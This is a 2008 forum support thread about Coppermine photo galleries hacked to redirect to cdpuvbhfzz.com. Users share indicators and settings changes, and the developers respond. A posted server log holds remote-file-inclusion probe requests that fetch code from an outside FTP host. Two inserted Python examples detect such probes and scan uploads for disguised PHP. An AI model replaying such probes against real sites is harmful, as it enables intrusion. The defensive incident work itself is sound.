Author Topic: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?  (Read 251506 times)


marian

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #80 on: April 10, 2008, 07:05:24 pm »

We put the back up in this morning; ran grep cdpuvbhfzz * -R > hacked.txt and all was clear, disabled URI. Now we have been hacked again.
No, we haven't yet upgraded as we were waiting for your new version.

Llama8668

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #81 on: April 10, 2008, 07:13:48 pm »

So does disabling URI and URL for guests (and if that is extended to all other groups as well?) not fix it (I've also put the galleries back up but will block access again if they're still vulnerable)?


marian

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #82 on: April 10, 2008, 07:18:12 pm »

Quote
So does disabling URI and URL for guests (and if that is extended to all other groups as well?) not fix it (I've also put the galleries back up but will block access again if they're still vulnerable)?

Seems not.

Llama8668

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #83 on: April 10, 2008, 07:25:57 pm »

Did you remove all instances of the uploaded file? (It seems the hack might use the URI functionality of Coppermine to upload a 142739_298w3 .zip/.jpg file to the default upload folder; this is then run to trigger the mass editing of files.)

Is there any other quick fix (such as temporarily removing URI related files or code) which could be employed as a stop gap?

Nibbler

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #84 on: April 10, 2008, 07:26:40 pm »

You should disable uploading completely for untrusted users (anonymous + unverified registrations) to be safe until the next version is released.

marian

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #85 on: April 10, 2008, 07:32:47 pm »


We haven't allowed posting by anyone other than admin for well over a year and have never had registered users.

Craig Walsh

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #86 on: April 10, 2008, 07:37:15 pm »

Quote
You should disable uploading completely for untrusted users (anonymous + unverified registrations) to be safe until the next version is released.

Yes, sir.  I've done that.  Did it first thing this morning, UK time.  We've not allowed posting by anyone (other than me, as admin) for several years, but we did have the URI Upload boxes (in Groups) set to other than 0.  Now 0's everywhere.

And I understand that you're all working very hard --- and I appreciate that, thank you --- to create the next version of CPG, which will prevent this problem happening again.  

On our own CPG site, although we have completely re-uploaded the latest version --- and we were running the latest version at the time of the attack last night --- we still seem to have this problem.  

I guess what I don't understand (and please don't growl at me for being thick --- guilty as charged!) is whether the next version, when released, will actually fix the current problem on my www.bark.ch website, or will only prevent it from happening again.

If it won't fix it, should I have my server people roll-back the site to yesterday's backup now?   And if we restore from yesterday's back-up, and are certain that uploading from other users is completely, totally shut down, is the problem unlikely to reoccur with the current version of CPG?

I guess I'm just trying to find out if I should wait for the new version --- because it will also fix this problem --- or whether we should restore, be sure uploads are disabled, and then wait for the new release?

Sorry for the questions.  I know you're all busy, and the last thing you want is my sticking my nose in . . . .
Craig Walsh
CPG Photo Gallery - www.bark.ch
Member of the Association of Photographers (AOP)

marian

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #87 on: April 10, 2008, 07:50:50 pm »

It looks to me as though this is escalating.

From our server logs:
root@server [/home3/public_html_hack]# cat /etc/httpd/domlogs/bymnews.com | grep upload
208.16.236.69 - - [10/Apr/2008:13:42:23 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 9290 "-" "libwww-perl/5.805"
208.16.236.69 - - [10/Apr/2008:13:42:24 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"
208.16.236.69 - - [10/Apr/2008:13:42:24 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"
217.67.26.84 - - [10/Apr/2008:14:49:37 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 9584 "-" "libwww-perl/5.805"
217.67.26.84 - - [10/Apr/2008:14:49:38 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"
217.67.26.84 - - [10/Apr/2008:14:49:38 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"
85.114.135.126 - - [10/Apr/2008:14:50:51 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 9584 "-" "libwww-perl/5.805"
85.114.135.126 - - [10/Apr/2008:14:50:51 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"
85.114.135.126 - - [10/Apr/2008:14:50:52 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"
209.85.105.25 - - [10/Apr/2008:15:26:44 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 9584 "-" "libwww-perl/5.79"
209.85.105.25 - - [10/Apr/2008:15:26:45 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
209.85.105.25 - - [10/Apr/2008:15:26:46 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
195.5.117.252 - - [10/Apr/2008:18:46:01 +0200] "POST /photos/upload.php HTTP/1.1" 200 6920 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [10/Apr/2008:18:47:13 +0200] "POST /photos/upload.php HTTP/1.1" 200 43854 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [10/Apr/2008:18:47:22 +0200] "POST /photos/upload.php HTTP/1.1" 200 6782 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
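A triage pass over access-log lines of the kind marian posted above, as an added example that is not from the thread or from Coppermine: it picks out query values that are themselves URLs (the remote-include probes), the scanner user-agent, and POSTs to upload.php so they can be matched against who was really logged in. The sample lines are constructed with documentation-range addresses.

```python
"""Triage Apache combined-log lines for the probe pattern shown in this thread.
Added example (not from the thread or from Coppermine). SAMPLE_LOG is constructed
to mirror the posted lines; the addresses are placeholders, not real sources."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_URL = re.compile(r'(?i)\b(?:ftp|https?)://')

def triage(line):
    """Return the reasons a line deserves a look, or [] for ordinary traffic."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    parts = urlsplit(unquote(m['path']))
    # A query value that is itself a URL is the signature of a remote-include
    # probe (the ?act=ftp://... requests above); the parameter name varies.
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if any(REMOTE_URL.search(v) for v in values):
            reasons.append(f"remote URL in parameter {key!r}")
    # libwww-perl is the default User-Agent of Perl scripts; browsers never send it.
    if m['ua'].startswith('libwww-perl'):
        reasons.append("scanner user-agent")
    # With uploads limited to trusted users, every POST to upload.php must be
    # accounted for by a known session; flag them all for comparison.
    if m['method'] == 'POST' and parts.path.endswith('/upload.php'):
        reasons.append("POST to upload.php")
    return reasons

SAMPLE_LOG = [  # constructed sample, shaped like the lines posted in the thread
    '192.0.2.10 - - [10/Apr/2008:13:42:23 +0200] "GET /news/newsDetails.php'
    '?id=5686/home.php?act=ftp://198.51.100.7/incoming/x?? HTTP/1.1" 200 9290 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [10/Apr/2008:13:42:24 +0200] "GET /home.php?act=ftp://198.51.100.7/incoming/x?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"',
    '192.0.2.20 - - [10/Apr/2008:18:46:01 +0200] "POST /photos/upload.php HTTP/1.1" 200 6920 "-" "Opera/9.27 (Windows NT 5.2; U; ru)"',
    '192.0.2.30 - - [10/Apr/2008:18:50:00 +0200] "GET /photos/thumbnails.php?album=3 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
]

def flagged(lines):
    """Return [(source ip, reasons)] for every line triage() flags."""
    return [(l.split(' ', 1)[0], r) for l in lines if (r := triage(l))]

if __name__ == '__main__':
    for ip, reasons in flagged(SAMPLE_LOG):
        print(ip, '; '.join(reasons))
```

Run it against the real domlog with `flagged(open(path).read().splitlines())`; the source addresses it returns are the ones to cross-check against your own sessions and the upload timestamps.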

Nibbler

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #88 on: April 10, 2008, 07:59:03 pm »

You are asking questions I can't give answers for. How you run your server is up to you. The new version will close *a* security hole I found in upload.php when I checked it after seeing it in the logs people posted here. It won't repair anything, just closes a hole. Since this vulnerability was not responsibly disclosed to us (i.e. this is a zero-day exploit) I can't know that that is how your site was hacked. I can't know what scripts were uploaded to your server. I don't know any more than you do.


Nibbler

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #90 on: April 10, 2008, 08:13:24 pm »

Of course it is. Coppermine does not have the files that you show being requested. I already asked people to stop posting random bits of information and I really don't want to have to lock the thread.

Richw2k2

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #91 on: April 10, 2008, 08:17:25 pm »

The same has happened to me. I have Coppermine in a gallery folder (which I think is a virtual directory?) http://gallery...
Only coppermine exists in this folder and all the php files in this folder have been modified.

I had a similar file but it was a jpg called

142739_298w3.jpg

marian

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #92 on: April 10, 2008, 08:26:36 pm »

Quote
Of course it is. Coppermine does not have the files that you show being requested. I already asked people to stop posting random bits of information and I really don't want to have to lock the thread.

I apologise, but as CPGNuke mentioned it going for Coppermine, I thought maybe another vulnerability might be under target.

Llama8668

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #93 on: April 10, 2008, 08:27:57 pm »

If cdpuvbhfzz is a successful exploit of all galleries then it is still a little surprising that it's only affected a few so far (there are big sites which run Coppermine which you'd think would be targeted en masse if damage were desired).

So far the cleaned sites are okay (all URI and URL slots have been set to 0 and all the checkboxes for guests are set to no). It's not too much of a problem now that things are back online (and that it's being looked into by the coppermine staff). If the automated removal script a few pages back can be run by all then that will remove the frustration.

Llama8668

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #94 on: April 10, 2008, 09:13:10 pm »

One of my sites has been hacked again (that's with URI and URL set to 0 for all groups) :-\. There's no obvious sign of the offending file within the default upload folder (though the custom header edit points to 142739_298w3.jpg). Perhaps I'm not cleaning the right files from the gallery directory?

marian

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #95 on: April 10, 2008, 09:19:28 pm »

Quote
One of my sites has been hacked again (that's with URI and URL set to 0 for all groups) :-\. There's no obvious sign of the offending file within the default upload folder (though the custom header edit points to 142739_298w3.jpg). Perhaps I'm not cleaning the right files from the gallery directory?

I hope this won't get this thread locked, but I would like to know what versions of PHP and Apache those who have been hacked are running?

Joachim Müller

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #96 on: April 10, 2008, 10:38:22 pm »

This thread will get locked if you don't stop posting irrelevant questions and bits that are meaningless ::).

Do I find it funny that especially people who have a notorious record of misbehaviour on this board turn up on this thread after a long period of silence? No.

OK, everybody please stop it, really! Stop replying to this thread, asking the same questions over and over. We can't tell you how to clean your site once it has been hacked - that's beyond the scope of this site. We can only tell you what you can do to prevent getting hacked: do as Nibbler suggested repeatedly. Don't ask stupid questions like "how can I disable URI uploads": this is being explained in the docs and has been explained in this thread as well.
I understand that those of you who got hacked are upset, but it certainly won't help to clutter this thread even further.

From now on I'll delete every invalid new posting (like "help, I've been hacked as well" or similar crap) from this thread immediately and I will ban that user from posting for a week. I mean it! Only totally valid replies to this thread are allowed - if you're not sure if your posting is going to be valid, don't post it.

Those who haven't been hacked should still do as Nibbler suggested and lock down their gallery: disallow URI uploads, disallow uploads from untrusted sources. Make a backup of your files and your database now.

Joachim

shiftsrl

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #97 on: April 10, 2008, 11:19:03 pm »

OK, hoping not to be banned, I would like to give you some information.

I've closed the URI upload and the hack has happened again but in half, I think.

I've found in Path to custom header include the usual path to the .jpg or .zip file, /albums/userpics/1001/xxxxx; the only difference is that the file was not there, and neither was the directory 1001.

My configuration options were always changed this way:

Number of albums to display is set to 1 (mine was 8)
Number of columns for the album list is set to 1 (mine was 2)
Number of columns on thumbnail page is set to 1 (mine was 4)
Number of rows on thumbnail page is set to 1 (mine was 4)

I've noticed that every time these settings are changed in exactly that way, this means that my gallery was "hacked" and that I'll find the string in Path to custom header include.

I hope this will help you guys...
Shift Srl

Joachim Müller

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #98 on: April 10, 2008, 11:23:25 pm »

You probably haven't sanitized the hacked gallery. Once you have been hacked, it's not enough to just close the vulnerability, as the attacker probably has left a backdoor. You haven't even told us if you have successfully removed the payload of the trojan. You have to make sure that your site was clean before being able to post a report about a re-infection.

shiftsrl

Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #99 on: April 11, 2008, 09:13:24 am »

I've removed the 142739_298w3.zip or 142739_298w3.jpg file the first time I noticed the infection. After that I've not found it anymore. I'm the only one allowed to upload on my gallery and I've disabled the URI upload for all groups. Now that you've told me, I've checked in the userpics folder (that I don't use to upload pics) and found two 1x1 pixel files called gd1.jpg and gd2.jpg, so I've removed them. All the other files are regular image files and the index.html and index.php are OK.

Problem is: how can I sanitize the gallery completely to avoid these annoyances? It seems that now the attack consists only in changing the parameters I explained in my last message. Is there a file I could lock to avoid these changes?
Shift Srl
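Two checks that follow from what Llama8668 and shiftsrl reported (a .zip/.jpg payload dropped into the upload tree, and the header include and layout values being rewritten), as an added example that is neither from the thread nor Coppermine's own code. The cpg_config key names used here are assumptions to be matched against your own cpg_config table, and the sample rows are constructed.

```python
"""Post-incident checks built from the indicators reported in this thread:
disguised payloads in the upload tree and the tampered config values.
Added example, not Coppermine code. The cpg_config key names are assumed
(check them against your install); the sample rows in the tests are constructed."""
import os
import re

IMAGE_MAGIC = (b'\xff\xd8\xff', b'\x89PNG', b'GIF8')          # JPEG, PNG, GIF headers
PHP_TAG = re.compile(rb'<\?(?:php\b|=)', re.I)
LAYOUT_KEYS = ('albums_per_page', 'album_list_cols', 'thumbcols', 'thumbrows')  # assumed names

def classify_upload(name, data):
    """Return None for a plausible picture, else why the file needs review."""
    lname = name.lower()
    if lname in ('index.php', 'index.html'):
        return None                           # Coppermine's own directory placeholders
    if lname.rsplit('.', 1)[-1] in ('php', 'phtml', 'html', 'htm'):
        return 'script in upload tree'
    if PHP_TAG.search(data):
        return 'PHP tag inside a non-script file'
    if not data.startswith(IMAGE_MAGIC):
        return 'not an image (zip or unknown header)'
    return None

def scan_uploads(root):
    """Walk an albums/userpics tree; return sorted [(relative path, reason)]."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, 'rb') as fh:
                data = fh.read(65536)         # header plus enough body to spot a PHP tag
            reason = classify_upload(name, data)
            if reason:
                findings.append((os.path.relpath(full, root), reason))
    return sorted(findings)

def config_indicators(rows, header_key='user_include_path'):
    """Flag (name, value) config rows showing the tampering pattern from the thread."""
    cfg = dict(rows)
    reasons = []
    include = cfg.get(header_key, '')
    # The header include should be empty or a PHP file, never a picture or archive.
    if re.search(r'\.(?:jpe?g|gif|png|zip)$', include, re.I) or 'userpics' in include:
        reasons.append(f'{header_key} points at an upload: {include}')
    if all(cfg.get(k) == '1' for k in LAYOUT_KEYS):
        reasons.append('album and thumbnail layout all forced to 1')
    return reasons
```

Feed `config_indicators` the rows from `SELECT name, value FROM cpg_config` and run `scan_uploads` on the albums directory; anything it returns is a file to quarantine, not just delete, so the backdoor Joachim mentions can be identified.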